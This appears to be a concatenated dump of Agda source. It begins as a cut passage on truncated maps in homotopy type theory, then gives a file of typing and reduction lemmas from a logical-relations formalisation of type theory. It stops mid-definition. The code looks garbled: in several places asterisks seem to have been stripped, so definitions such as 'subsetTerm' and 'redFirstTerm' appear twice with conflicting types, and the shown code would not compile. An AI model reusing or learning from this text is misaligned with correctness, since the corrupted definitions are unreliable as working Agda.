= is-trunc-is-equiv k ( Σ A (λ z → Id (g z) b)) ( fib-triangle f g id H b) ( is-fiberwise-equiv-is-equiv-triangle f g id H (is-equiv-id _) b) ( is-trunc-g b) abstract is-trunc-map-comp : {l1 l2 l3 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} {X : UU l3} (f : A → X) (g : B → X) (h : A → B) (H : f ~ (g ∘ h)) → is-trunc-map k g → is-trunc-map k h → is-trunc-map k f is-trunc-map-comp k f g h H is-trunc-g is-trunc-h = is-trunc-map-htpy k f (g ∘ h) H ( λ x → is-trunc-is-equiv k ( Σ (fib g x) (λ t → fib h (pr1 t))) ( map-fib-comp g h x) ( is-equiv-map-fib-comp g h x) ( is-trunc-Σ k ( is-trunc-g x) ( λ t → is-trunc-h (pr1 t)))) abstract is-trunc-map-right-factor : {l1 l2 l3 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} {X : UU l3} (f : A → X) (g : B → X) (h : A → B) (H : f ~ (g ∘ h)) → is-trunc-map k g → is-trunc-map k f → is-trunc-map k h is-trunc-map-right-factor k {A} f g h H is-trunc-g is-trunc-f b = is-trunc-fam-is-trunc-Σ k ( is-trunc-g (g b)) ( is-trunc-is-equiv' k ( Σ A (λ z → Id (g (h z)) (g b))) ( map-fib-comp g h (g b)) ( is-equiv-map-fib-comp g h (g b)) ( is-trunc-map-htpy k (g ∘ h) f (htpy-inv H) is-trunc-f (g b))) ( pair b refl) abstract is-trunc-map-succ-is-trunc-map : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} (f : A → B) → is-trunc-map k f → is-trunc-map (succ-𝕋 k) f is-trunc-map-succ-is-trunc-map k f is-trunc-f b = is-trunc-succ-is-trunc k (fib f b) (is-trunc-f b)
Definition/Typed/Properties.agda	CoqHott/logrel-mltt	2	11902	{-# OPTIONS --safe #-} module Definition.Typed.Properties where open import Definition.Untyped open import Definition.Untyped.Properties open import Definition.Typed open import Definition.Typed.RedSteps import Definition.Typed.Weakening as Twk open import Tools.Empty using (⊥; ⊥-elim) open import Tools.Product open import Tools.Sum hiding (id ; sym) import Tools.PropositionalEquality as PE import Data.Fin as Fin import Data.Nat as Nat -- Escape context extraction wfTerm : ∀ {Γ A t r} → Γ ⊢ t ∷ A ^ r → ⊢ Γ wfTerm (univ <l ⊢Γ) = ⊢Γ wfTerm (ℕⱼ ⊢Γ) = ⊢Γ wfTerm (Emptyⱼ ⊢Γ) = ⊢Γ wfTerm (Πⱼ <l ▹ <l' ▹ F ▹ G) = wfTerm F wfTerm (∃ⱼ F ▹ G) = wfTerm F wfTerm (var ⊢Γ x₁) = ⊢Γ wfTerm (lamⱼ _ _ F t) with wfTerm t wfTerm (lamⱼ _ _ F t) \| ⊢Γ ∙ F′ = ⊢Γ wfTerm (g ∘ⱼ a) = wfTerm a wfTerm (⦅ F , G , t , u ⦆ⱼ) = wfTerm t wfTerm (fstⱼ A B t) = wfTerm t wfTerm (sndⱼ A B t) = wfTerm t wfTerm (zeroⱼ ⊢Γ) = ⊢Γ wfTerm (sucⱼ n) = wfTerm n wfTerm (natrecⱼ F z s n) = wfTerm z wfTerm (Emptyrecⱼ A e) = wfTerm e wfTerm (Idⱼ A t u) = wfTerm t wfTerm (Idreflⱼ t) = wfTerm t wfTerm (transpⱼ A P t s u e) = wfTerm t wfTerm (castⱼ A B e t) = wfTerm t wfTerm (castreflⱼ A t) = wfTerm t wfTerm (conv t A≡B) = wfTerm t wf : ∀ {Γ A r} → Γ ⊢ A ^ r → ⊢ Γ wf (Uⱼ ⊢Γ) = ⊢Γ wf (univ A) = wfTerm A mutual wfEqTerm : ∀ {Γ A t u r} → Γ ⊢ t ≡ u ∷ A ^ r → ⊢ Γ wfEqTerm (refl t) = wfTerm t wfEqTerm (sym t≡u) = wfEqTerm t≡u wfEqTerm (trans t≡u u≡r) = wfEqTerm t≡u wfEqTerm (conv t≡u A≡B) = wfEqTerm t≡u wfEqTerm (Π-cong _ _ F F≡H G≡E) = wfEqTerm F≡H wfEqTerm (∃-cong F F≡H G≡E) = wfEqTerm F≡H wfEqTerm (app-cong f≡g a≡b) = wfEqTerm f≡g wfEqTerm (β-red _ _ F t a) = wfTerm a wfEqTerm (η-eq _ _ F f g f0≡g0) = wfTerm f wfEqTerm (suc-cong n) = wfEqTerm n wfEqTerm (natrec-cong F≡F′ z≡z′ s≡s′ n≡n′) = wfEqTerm z≡z′ wfEqTerm (natrec-zero F z s) = wfTerm z wfEqTerm (natrec-suc n F z s) = wfTerm n wfEqTerm (Emptyrec-cong A≡A' _ _) = wfEq A≡A' wfEqTerm (proof-irrelevance t u) = wfTerm t wfEqTerm (Id-cong A t u) = wfEqTerm u wfEqTerm (Id-Π _ _ A B t u) = wfTerm t wfEqTerm (Id-ℕ-00 ⊢Γ) = ⊢Γ wfEqTerm (Id-ℕ-SS m n) = wfTerm n wfEqTerm (Id-U-ΠΠ A B A' B') = wfTerm A wfEqTerm (Id-U-ℕℕ ⊢Γ) = ⊢Γ wfEqTerm (Id-SProp A B) = wfTerm A wfEqTerm (Id-ℕ-0S n) = wfTerm n wfEqTerm (Id-ℕ-S0 n) = wfTerm n wfEqTerm (Id-U-ℕΠ A B) = wfTerm A wfEqTerm (Id-U-Πℕ A B) = wfTerm A wfEqTerm (Id-U-ΠΠ!% eq A B A' B') = wfTerm A wfEqTerm (cast-cong A B t _ _) = wfEqTerm t wfEqTerm (cast-Π A B A' B' e f) = wfTerm f wfEqTerm (cast-ℕ-0 e) = wfTerm e wfEqTerm (cast-ℕ-S e n) = wfTerm n wfEq : ∀ {Γ A B r} → Γ ⊢ A ≡ B ^ r → ⊢ Γ wfEq (univ A≡B) = wfEqTerm A≡B wfEq (refl A) = wf A wfEq (sym A≡B) = wfEq A≡B wfEq (trans A≡B B≡C) = wfEq A≡B -- Reduction is a subset of conversion subsetTerm : ∀ {Γ A t u l} → Γ ⊢ t ⇒ u ∷ A ^ l → Γ ⊢ t ≡ u ∷ A ^ [ ! , l ] subset : ∀ {Γ A B r} → Γ ⊢ A ⇒ B ^ r → Γ ⊢ A ≡ B ^ r subsetTerm (natrec-subst F z s n⇒n′) = natrec-cong (refl F) (refl z) (refl s) (subsetTerm n⇒n′) subsetTerm (natrec-zero F z s) = natrec-zero F z s subsetTerm (natrec-suc n F z s) = natrec-suc n F z s subsetTerm (app-subst {rA = !} t⇒u a) = app-cong (subsetTerm t⇒u) (refl a) subsetTerm (app-subst {rA = %} t⇒u a) = app-cong (subsetTerm t⇒u) (proof-irrelevance a a) subsetTerm (β-red l< l<' A t a) = β-red l< l<' A t a subsetTerm (conv t⇒u A≡B) = conv (subsetTerm t⇒u) A≡B subsetTerm (Id-subst A t u) = Id-cong (subsetTerm A) (refl t) (refl u) subsetTerm (Id-ℕ-subst m n) = Id-cong (refl (ℕⱼ (wfTerm n))) (subsetTerm m) (refl n) subsetTerm (Id-ℕ-0-subst n) = let ⊢Γ = wfEqTerm (subsetTerm n) in Id-cong (refl (ℕⱼ ⊢Γ)) (refl (zeroⱼ ⊢Γ)) (subsetTerm n) subsetTerm (Id-ℕ-S-subst m n) = Id-cong (refl (ℕⱼ (wfTerm m))) (refl (sucⱼ m)) (subsetTerm n) subsetTerm (Id-U-subst A B) = Id-cong (refl (univ 0<1 (wfTerm B))) (subsetTerm A) (refl B) subsetTerm (Id-U-ℕ-subst B) = let ⊢Γ = wfEqTerm (subsetTerm B) in Id-cong (refl (univ 0<1 ⊢Γ)) (refl (ℕⱼ ⊢Γ)) (subsetTerm B) subsetTerm (Id-U-Π-subst A P B) = Id-cong (refl (univ 0<1 (wfTerm A))) (refl (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ P)) (subsetTerm B) subsetTerm (Id-Π <l <l' A B t u) = Id-Π <l <l' A B t u subsetTerm (Id-ℕ-00 ⊢Γ) = Id-ℕ-00 ⊢Γ subsetTerm (Id-ℕ-SS m n) = Id-ℕ-SS m n subsetTerm (Id-U-ΠΠ A B A' B') = Id-U-ΠΠ A B A' B' subsetTerm (Id-U-ℕℕ ⊢Γ) = Id-U-ℕℕ ⊢Γ subsetTerm (Id-SProp A B) = Id-SProp A B subsetTerm (Id-ℕ-0S n) = Id-ℕ-0S n subsetTerm (Id-ℕ-S0 n) = Id-ℕ-S0 n subsetTerm (Id-U-ℕΠ A B) = Id-U-ℕΠ A B subsetTerm (Id-U-Πℕ A B) = Id-U-Πℕ A B subsetTerm (Id-U-ΠΠ!% eq A B A' B') = Id-U-ΠΠ!% eq A B A' B' subsetTerm (cast-subst A B e t) = let ⊢Γ = wfEqTerm (subsetTerm A) in cast-cong (subsetTerm A) (refl B) (refl t) e (conv e (univ (Id-cong (refl (univ 0<1 ⊢Γ)) (subsetTerm A) (refl B)))) subsetTerm (cast-ℕ-subst B e t) = let ⊢Γ = wfEqTerm (subsetTerm B) in cast-cong (refl (ℕⱼ (wfTerm t))) (subsetTerm B) (refl t) e (conv e (univ (Id-cong (refl (univ 0<1 ⊢Γ)) (refl (ℕⱼ ⊢Γ)) (subsetTerm B)))) subsetTerm (cast-Π-subst A P B e t) = let ⊢Γ = wfTerm A in cast-cong (refl (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ P)) (subsetTerm B) (refl t) e (conv e (univ (Id-cong (refl (univ 0<1 ⊢Γ)) (refl (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ A ▹ P)) (subsetTerm B) ))) subsetTerm (cast-Π A B A' B' e f) = cast-Π A B A' B' e f subsetTerm (cast-ℕ-0 e) = cast-ℕ-0 e subsetTerm (cast-ℕ-S e n) = cast-ℕ-S e n subsetTerm (cast-ℕ-cong e n) = let ⊢Γ = wfTerm e ⊢ℕ = ℕⱼ ⊢Γ in cast-cong (refl ⊢ℕ) (refl ⊢ℕ) (subsetTerm n) e e subset (univ A⇒B) = univ (subsetTerm A⇒B) subsetTerm : ∀ {Γ A t u l } → Γ ⊢ t ⇒ u ∷ A ^ l → Γ ⊢ t ≡ u ∷ A ^ [ ! , l ] subsetTerm (id t) = refl t subsetTerm (t⇒t′ ⇨ t⇒u) = trans (subsetTerm t⇒t′) (subsetTerm t⇒u) subset : ∀ {Γ A B r} → Γ ⊢ A ⇒* B ^ r → Γ ⊢ A ≡ B ^ r subset* (id A) = refl A subset* (A⇒A′ ⇨ A′⇒B) = trans (subset A⇒A′) (subset A′⇒B) -- Transitivity of reduction transTerm⇒ : ∀ {Γ A t u v l } → Γ ⊢ t ⇒* u ∷ A ^ l → Γ ⊢ u ⇒* v ∷ A ^ l → Γ ⊢ t ⇒* v ∷ A ^ l transTerm⇒* (id x) y = y transTerm⇒* (x ⇨ x₁) y = x ⇨ transTerm⇒* x₁ y trans⇒* : ∀ {Γ A B C r} → Γ ⊢ A ⇒* B ^ r → Γ ⊢ B ⇒* C ^ r → Γ ⊢ A ⇒* C ^ r trans⇒* (id x) y = y trans⇒* (x ⇨ x₁) y = x ⇨ trans⇒* x₁ y transTerm:⇒:* : ∀ {Γ A t u v l } → Γ ⊢ t :⇒: u ∷ A ^ l → Γ ⊢ u :⇒: v ∷ A ^ l → Γ ⊢ t :⇒: v ∷ A ^ l transTerm:⇒: [[ ⊢t , ⊢u , d ]] [[ ⊢t₁ , ⊢u₁ , d₁ ]] = [[ ⊢t , ⊢u₁ , (transTerm⇒* d d₁) ]] conv⇒* : ∀ {Γ A B l t u} → Γ ⊢ t ⇒* u ∷ A ^ l → Γ ⊢ A ≡ B ^ [ ! , l ] → Γ ⊢ t ⇒* u ∷ B ^ l conv⇒* (id x) e = id (conv x e) conv⇒* (x ⇨ D) e = conv x e ⇨ conv⇒* D e conv:⇒: : ∀ {Γ A B l t u} → Γ ⊢ t :⇒: u ∷ A ^ l → Γ ⊢ A ≡ B ^ [ ! , l ] → Γ ⊢ t :⇒: u ∷ B ^ l conv:⇒: [[ ⊢t , ⊢u , d ]] e = [[ (conv ⊢t e) , (conv ⊢u e) , (conv⇒* d e) ]] -- Can extract left-part of a reduction redFirstTerm : ∀ {Γ t u A l } → Γ ⊢ t ⇒ u ∷ A ^ l → Γ ⊢ t ∷ A ^ [ ! , l ] redFirst : ∀ {Γ A B r} → Γ ⊢ A ⇒ B ^ r → Γ ⊢ A ^ r redFirstTerm (conv t⇒u A≡B) = conv (redFirstTerm t⇒u) A≡B redFirstTerm (app-subst t⇒u a) = (redFirstTerm t⇒u) ∘ⱼ a redFirstTerm (β-red {lA = lA} {lB = lB} lA< lB< ⊢A ⊢t ⊢a) = (lamⱼ lA< lB< ⊢A ⊢t) ∘ⱼ ⊢a redFirstTerm (natrec-subst F z s n⇒n′) = natrecⱼ F z s (redFirstTerm n⇒n′) redFirstTerm (natrec-zero F z s) = natrecⱼ F z s (zeroⱼ (wfTerm z)) redFirstTerm (natrec-suc n F z s) = natrecⱼ F z s (sucⱼ n) redFirstTerm (Id-subst A t u) = Idⱼ (redFirstTerm A) t u redFirstTerm (Id-ℕ-subst m n) = Idⱼ (ℕⱼ (wfTerm n)) (redFirstTerm m) n redFirstTerm (Id-ℕ-0-subst n) = Idⱼ (ℕⱼ (wfEqTerm (subsetTerm n))) (zeroⱼ (wfEqTerm (subsetTerm n))) (redFirstTerm n) redFirstTerm (Id-ℕ-S-subst m n) = Idⱼ (ℕⱼ (wfTerm m)) (sucⱼ m) (redFirstTerm n) redFirstTerm (Id-U-subst A B) = Idⱼ (univ 0<1 (wfTerm B)) (redFirstTerm A) B redFirstTerm (Id-U-ℕ-subst B) = let ⊢Γ = (wfEqTerm (subsetTerm B)) in Idⱼ (univ 0<1 ⊢Γ) (ℕⱼ ⊢Γ) (redFirstTerm B) redFirstTerm (Id-U-Π-subst A P B) = Idⱼ (univ 0<1 (wfTerm A)) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ P) (redFirstTerm B) redFirstTerm (Id-Π {rA = rA} <l <l' A B t u) = Idⱼ (Πⱼ <l ▹ <l' ▹ A ▹ B) t u redFirstTerm (Id-ℕ-00 ⊢Γ) = Idⱼ (ℕⱼ ⊢Γ) (zeroⱼ ⊢Γ) (zeroⱼ ⊢Γ) redFirstTerm (Id-ℕ-SS m n) = Idⱼ (ℕⱼ (wfTerm m)) (sucⱼ m) (sucⱼ n) redFirstTerm (Id-U-ΠΠ A B A' B') = Idⱼ (univ 0<1 (wfTerm A)) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ B) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A' ▹ B') redFirstTerm (Id-U-ℕℕ ⊢Γ) = Idⱼ (univ 0<1 ⊢Γ) (ℕⱼ ⊢Γ) (ℕⱼ ⊢Γ) redFirstTerm (Id-SProp A B) = Idⱼ (univ 0<1 (wfTerm A)) A B redFirstTerm (Id-ℕ-0S n) = Idⱼ (ℕⱼ (wfTerm n)) (zeroⱼ (wfTerm n)) (sucⱼ n) redFirstTerm (Id-ℕ-S0 n) = Idⱼ (ℕⱼ (wfTerm n)) (sucⱼ n) (zeroⱼ (wfTerm n)) redFirstTerm (Id-U-ℕΠ A B) = Idⱼ (univ 0<1 (wfTerm A)) (ℕⱼ (wfTerm A)) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ B) redFirstTerm (Id-U-Πℕ A B) = Idⱼ (univ 0<1 (wfTerm A)) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ B) (ℕⱼ (wfTerm A)) redFirstTerm (Id-U-ΠΠ!% eq A B A' B') = Idⱼ (univ 0<1 (wfTerm A)) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ B) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A' ▹ B') redFirstTerm (cast-subst A B e t) = castⱼ (redFirstTerm A) B e t redFirstTerm (cast-ℕ-subst B e t) = castⱼ (ℕⱼ (wfTerm t)) (redFirstTerm B) e t redFirstTerm (cast-Π-subst A P B e t) = castⱼ (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ P) (redFirstTerm B) e t redFirstTerm (cast-Π A B A' B' e f) = castⱼ (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ B) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A' ▹ B') e f redFirstTerm (cast-ℕ-0 e) = castⱼ (ℕⱼ (wfTerm e)) (ℕⱼ (wfTerm e)) e (zeroⱼ (wfTerm e)) redFirstTerm (cast-ℕ-S e n) = castⱼ (ℕⱼ (wfTerm e)) (ℕⱼ (wfTerm e)) e (sucⱼ n) redFirstTerm (cast-ℕ-cong e n) = castⱼ (ℕⱼ (wfTerm e)) (ℕⱼ (wfTerm e)) e (redFirstTerm n) redFirst (univ A⇒B) = univ (redFirstTerm A⇒B) redFirstTerm : ∀ {Γ t u A l} → Γ ⊢ t ⇒ u ∷ A ^ l → Γ ⊢ t ∷ A ^ [ ! , l ] redFirstTerm (id t) = t redFirstTerm (t⇒t′ ⇨ t′⇒u) = redFirstTerm t⇒t′ redFirst : ∀ {Γ A B r} → Γ ⊢ A ⇒* B ^ r → Γ ⊢ A ^ r redFirst* (id A) = A redFirst* (A⇒A′ ⇨ A′⇒B) = redFirst A⇒A′ -- Neutral types are always small -- tyNe : ∀ {Γ t r} → Γ ⊢ t ^ r → Neutral t → Γ ⊢ t ∷ (Univ r) ^ ! -- tyNe (univ x) tn = x -- tyNe (Idⱼ A x y) tn = Idⱼ A x y -- Neutrals do not weak head reduce neRedTerm : ∀ {Γ t u l A} (d : Γ ⊢ t ⇒ u ∷ A ^ l) (n : Neutral t) → ⊥ neRed : ∀ {Γ t u r} (d : Γ ⊢ t ⇒ u ^ r) (n : Neutral t) → ⊥ whnfRedTerm : ∀ {Γ t u A l} (d : Γ ⊢ t ⇒ u ∷ A ^ l) (w : Whnf t) → ⊥ whnfRed : ∀ {Γ A B r} (d : Γ ⊢ A ⇒ B ^ r) (w : Whnf A) → ⊥ neRedTerm (conv d x) n = neRedTerm d n neRedTerm (app-subst d x) (∘ₙ n) = neRedTerm d n neRedTerm (β-red _ _ x x₁ x₂) (∘ₙ ()) neRedTerm (natrec-zero x x₁ x₂) (natrecₙ ()) neRedTerm (natrec-suc x x₁ x₂ x₃) (natrecₙ ()) neRedTerm (natrec-subst x x₁ x₂ tr) (natrecₙ tn) = neRedTerm tr tn neRedTerm (Id-subst tr x y) (Idₙ tn) = neRedTerm tr tn neRedTerm (Id-ℕ-subst tr x) (Idℕₙ tn) = neRedTerm tr tn neRedTerm (Id-ℕ-0-subst tr) (Idℕ0ₙ tn) = neRedTerm tr tn neRedTerm (Id-ℕ-S-subst x tr) (IdℕSₙ tn) = neRedTerm tr tn neRedTerm (Id-U-subst tr x) (IdUₙ tn) = neRedTerm tr tn neRedTerm (Id-U-ℕ-subst tr) (IdUℕₙ tn) = neRedTerm tr tn neRedTerm (Id-U-Π-subst A B tr) (IdUΠₙ tn) = neRedTerm tr tn neRedTerm (Id-subst tr x y) (Idℕₙ tn) = whnfRedTerm tr ℕₙ neRedTerm (Id-subst tr x y) (Idℕ0ₙ tn) = whnfRedTerm tr ℕₙ neRedTerm (Id-subst tr x y) (IdℕSₙ tn) = whnfRedTerm tr ℕₙ neRedTerm (Id-subst tr x y) (IdUₙ tn) = whnfRedTerm tr Uₙ neRedTerm (Id-subst tr x y) (IdUℕₙ tn) = whnfRedTerm tr Uₙ neRedTerm (Id-subst tr x y) (IdUΠₙ tn) = whnfRedTerm tr Uₙ neRedTerm (Id-ℕ-subst tr x) (Idℕ0ₙ tn) = whnfRedTerm tr zeroₙ neRedTerm (Id-ℕ-subst tr x) (IdℕSₙ tn) = whnfRedTerm tr sucₙ neRedTerm (Id-U-subst tr x) (IdUℕₙ tn) = whnfRedTerm tr ℕₙ neRedTerm (Id-U-subst tr x) (IdUΠₙ tn) = whnfRedTerm tr Πₙ neRedTerm (Id-Π _ _ A B t u) (Idₙ ()) neRedTerm (Id-ℕ-00 tr) (Idₙ ()) neRedTerm (Id-ℕ-00 tr) (Idℕₙ ()) neRedTerm (Id-ℕ-00 tr) (Idℕ0ₙ ()) neRedTerm (Id-ℕ-SS x tr) (Idₙ ()) neRedTerm (Id-ℕ-SS x tr) (Idℕₙ ()) neRedTerm (Id-U-ΠΠ A B A' B') (Idₙ ()) neRedTerm (Id-U-ΠΠ A B A' B') (IdUₙ ()) neRedTerm (Id-U-ΠΠ A B A' B') (IdUΠₙ ()) neRedTerm (Id-U-ℕℕ x) (Idₙ ()) neRedTerm (Id-U-ℕℕ x) (IdUₙ ()) neRedTerm (Id-U-ℕℕ x) (IdUℕₙ ()) neRedTerm (Id-SProp A B) (Idₙ ()) neRedTerm (Id-ℕ-0S x) (Idₙ ()) neRedTerm (Id-ℕ-S0 x) (Idₙ ()) neRedTerm (Id-U-ℕΠ A B) (Idₙ ()) neRedTerm (Id-U-Πℕ A B) (Idₙ ()) neRedTerm (Id-U-ΠΠ!% eq A B A' B') (Idₙ ()) neRedTerm (cast-subst tr B e x) (castₙ tn) = neRedTerm tr tn neRedTerm (cast-ℕ-subst tr e x) (castℕₙ tn) = neRedTerm tr tn neRedTerm (cast-Π-subst A B tr e x) (castΠₙ tn) = neRedTerm tr tn neRedTerm (cast-Π-subst A B tr e x) (castΠℕₙ) = whnfRedTerm tr ℕₙ neRedTerm (cast-subst tr x x₁ x₂) (castℕₙ tn) = whnfRedTerm tr ℕₙ neRedTerm (cast-subst tr x x₁ x₂) (castΠₙ tn) = whnfRedTerm tr Πₙ neRedTerm (cast-subst tr x x₁ x₂) (castℕℕₙ tn) = whnfRedTerm tr ℕₙ neRedTerm (cast-subst tr x x₁ x₂) (castℕΠₙ) = whnfRedTerm tr ℕₙ neRedTerm (cast-subst tr x x₁ x₂) (castΠℕₙ) = whnfRedTerm tr Πₙ neRedTerm (cast-ℕ-subst tr x x₁) (castℕℕₙ tn) = whnfRedTerm tr ℕₙ neRedTerm (cast-ℕ-subst tr x x₁) (castℕΠₙ) = whnfRedTerm tr Πₙ neRedTerm (cast-Π A B A' B' e f) (castₙ ()) neRedTerm (cast-Π A B A' B' e f) (castΠₙ ()) neRedTerm (cast-ℕ-0 x) (castₙ ()) neRedTerm (cast-ℕ-0 x) (castℕₙ ()) neRedTerm (cast-ℕ-0 x) (castℕℕₙ ()) neRedTerm (cast-ℕ-S x x₁) (castₙ ()) neRedTerm (cast-ℕ-S x x₁) (castℕₙ ()) neRedTerm (cast-ℕ-S x x₁) (castℕℕₙ ()) neRedTerm (cast-ℕ-cong x x₁) (castₙ ()) neRedTerm (cast-ℕ-cong x x₁) (castℕₙ ()) neRedTerm (cast-ℕ-cong x x₁) (castℕℕₙ t) = neRedTerm x₁ t neRedTerm (cast-subst d x x₁ x₂) castΠΠ%!ₙ = whnfRedTerm d Πₙ neRedTerm (cast-subst d x x₁ x₂) castΠΠ!%ₙ = whnfRedTerm d Πₙ neRedTerm (cast-Π-subst x x₁ d x₂ x₃) castΠΠ%!ₙ = whnfRedTerm d Πₙ neRedTerm (cast-Π-subst x x₁ d x₂ x₃) castΠΠ!%ₙ = whnfRedTerm d Πₙ neRed (univ x) N = neRedTerm x N whnfRedTerm (conv d x) w = whnfRedTerm d w whnfRedTerm (app-subst d x) (ne (∘ₙ x₁)) = neRedTerm d x₁ whnfRedTerm (β-red _ _ x x₁ x₂) (ne (∘ₙ ())) whnfRedTerm (natrec-subst x x₁ x₂ d) (ne (natrecₙ x₃)) = neRedTerm d x₃ whnfRedTerm (natrec-zero x x₁ x₂) (ne (natrecₙ ())) whnfRedTerm (natrec-suc x x₁ x₂ x₃) (ne (natrecₙ ())) whnfRedTerm (Id-subst d x x₁) (ne (Idₙ x₂)) = neRedTerm d x₂ whnfRedTerm (Id-subst d x x₁) (ne (Idℕₙ x₂)) = whnfRedTerm d ℕₙ whnfRedTerm (Id-subst d x x₁) (ne (Idℕ0ₙ x₂)) = whnfRedTerm d ℕₙ whnfRedTerm (Id-subst d x x₁) (ne (IdℕSₙ x₂)) = whnfRedTerm d ℕₙ whnfRedTerm (Id-subst d x x₁) (ne (IdUₙ x₂)) = whnfRedTerm d Uₙ whnfRedTerm (Id-subst d x x₁) (ne (IdUℕₙ x₂)) = whnfRedTerm d Uₙ whnfRedTerm (Id-subst d x x₁) (ne (IdUΠₙ x₂)) = whnfRedTerm d Uₙ whnfRedTerm (Id-ℕ-subst d x) (ne (Idℕₙ x₁)) = neRedTerm d x₁ whnfRedTerm (Id-ℕ-subst d x) (ne (Idℕ0ₙ x₁)) = whnfRedTerm d zeroₙ whnfRedTerm (Id-ℕ-subst d x) (ne (IdℕSₙ x₁)) = whnfRedTerm d sucₙ whnfRedTerm (Id-ℕ-0-subst d) (ne (Idℕ0ₙ x)) = neRedTerm d x whnfRedTerm (Id-ℕ-S-subst x d) (ne (IdℕSₙ x₁)) = neRedTerm d x₁ whnfRedTerm (Id-U-subst d x) (ne (IdUₙ x₁)) = neRedTerm d x₁ whnfRedTerm (Id-U-subst d x) (ne (IdUℕₙ x₁)) = whnfRedTerm d ℕₙ whnfRedTerm (Id-U-subst d x) (ne (IdUΠₙ x₁)) = whnfRedTerm d Πₙ whnfRedTerm (Id-U-ℕ-subst d) (ne (IdUℕₙ x)) = neRedTerm d x whnfRedTerm (Id-U-Π-subst x x₁ d) (ne (IdUΠₙ x₂)) = neRedTerm d x₂ whnfRedTerm (Id-Π _ _ x x₁ x₂ x₃) (ne (Idₙ ())) whnfRedTerm (Id-ℕ-00 x) (ne (Idₙ ())) whnfRedTerm (Id-ℕ-00 x) (ne (Idℕₙ ())) whnfRedTerm (Id-ℕ-00 x) (ne (Idℕ0ₙ ())) whnfRedTerm (Id-ℕ-SS x x₁) (ne (Idₙ ())) whnfRedTerm (Id-ℕ-SS x x₁) (ne (Idℕₙ ())) whnfRedTerm (Id-ℕ-SS x x₁) (ne (IdℕSₙ ())) whnfRedTerm (Id-U-ΠΠ x x₁ x₂ x₃) (ne (Idₙ ())) whnfRedTerm (Id-U-ΠΠ x x₁ x₂ x₃) (ne (IdUₙ ())) whnfRedTerm (Id-U-ΠΠ x x₁ x₂ x₃) (ne (IdUΠₙ ())) whnfRedTerm (Id-U-ℕℕ x) (ne (Idₙ ())) whnfRedTerm (Id-U-ℕℕ x) (ne (IdUₙ ())) whnfRedTerm (Id-U-ℕℕ x) (ne (IdUℕₙ ())) whnfRedTerm (Id-SProp x x₁) (ne (Idₙ ())) whnfRedTerm (Id-ℕ-0S x) (ne (Idₙ ())) whnfRedTerm (Id-ℕ-S0 x) (ne (Idₙ ())) whnfRedTerm (Id-U-ℕΠ A B) (ne (Idₙ ())) whnfRedTerm (Id-U-Πℕ A B) (ne (Idₙ ())) whnfRedTerm (Id-U-ΠΠ!% eq A B A' B') (ne (Idₙ ())) whnfRedTerm (cast-subst d x x₁ x₂) (ne (castₙ x₃)) = neRedTerm d x₃ whnfRedTerm (cast-subst d x x₁ x₂) (ne (castℕₙ x₃)) = whnfRedTerm d ℕₙ whnfRedTerm (cast-subst d x x₁ x₂) (ne (castΠₙ x₃)) = whnfRedTerm d Πₙ whnfRedTerm (cast-subst d x x₁ x₂) (ne (castℕℕₙ x₃)) = whnfRedTerm d ℕₙ whnfRedTerm (cast-subst d x x₁ x₂) (ne castℕΠₙ) = whnfRedTerm d ℕₙ whnfRedTerm (cast-subst d x x₁ x₂) (ne castΠℕₙ) = whnfRedTerm d Πₙ whnfRedTerm (cast-ℕ-subst d x x₁) (ne (castℕₙ x₂)) = neRedTerm d x₂ whnfRedTerm (cast-ℕ-subst d x x₁) (ne (castℕℕₙ x₂)) = whnfRedTerm d ℕₙ whnfRedTerm (cast-ℕ-subst d x x₁) (ne castℕΠₙ) = whnfRedTerm d Πₙ whnfRedTerm (cast-Π-subst x x₁ d x₂ x₃) (ne (castΠₙ x₄)) = neRedTerm d x₄ whnfRedTerm (cast-Π-subst x x₁ d x₂ x₃) (ne castΠℕₙ) = whnfRedTerm d ℕₙ whnfRedTerm (cast-Π x x₁ x₂ x₃ x₄ x₅) (ne (castₙ ())) whnfRedTerm (cast-Π x x₁ x₂ x₃ x₄ x₅) (ne (castΠₙ ())) whnfRedTerm (cast-ℕ-0 x) (ne (castₙ ())) whnfRedTerm (cast-ℕ-0 x) (ne (castℕₙ ())) whnfRedTerm (cast-ℕ-0 x) (ne (castℕℕₙ ())) whnfRedTerm (cast-ℕ-S x x₁) (ne (castₙ ())) whnfRedTerm (cast-ℕ-S x x₁) (ne (castℕₙ ())) whnfRedTerm (cast-ℕ-S x x₁) (ne (castℕℕₙ ())) whnfRedTerm (cast-ℕ-cong x x₁) (ne (castₙ ())) whnfRedTerm (cast-ℕ-cong x x₁) (ne (castℕₙ ())) whnfRedTerm (cast-ℕ-cong x x₁) (ne (castℕℕₙ t)) = neRedTerm x₁ t whnfRedTerm (cast-subst d x x₁ x₂) (ne castΠΠ%!ₙ) = whnfRedTerm d Πₙ whnfRedTerm (cast-subst d x x₁ x₂) (ne castΠΠ!%ₙ) = whnfRedTerm d Πₙ whnfRedTerm (cast-Π-subst x x₁ d x₂ x₃) (ne castΠΠ%!ₙ) = whnfRedTerm d Πₙ whnfRedTerm (cast-Π-subst x x₁ d x₂ x₃) (ne castΠΠ!%ₙ) = whnfRedTerm d Πₙ whnfRed (univ x) w = whnfRedTerm x w whnfRedTerm : ∀ {Γ t u A l} (d : Γ ⊢ t ⇒* u ∷ A ^ l) (w : Whnf t) → t PE.≡ u whnfRedTerm (id x) Uₙ = PE.refl whnfRedTerm (id 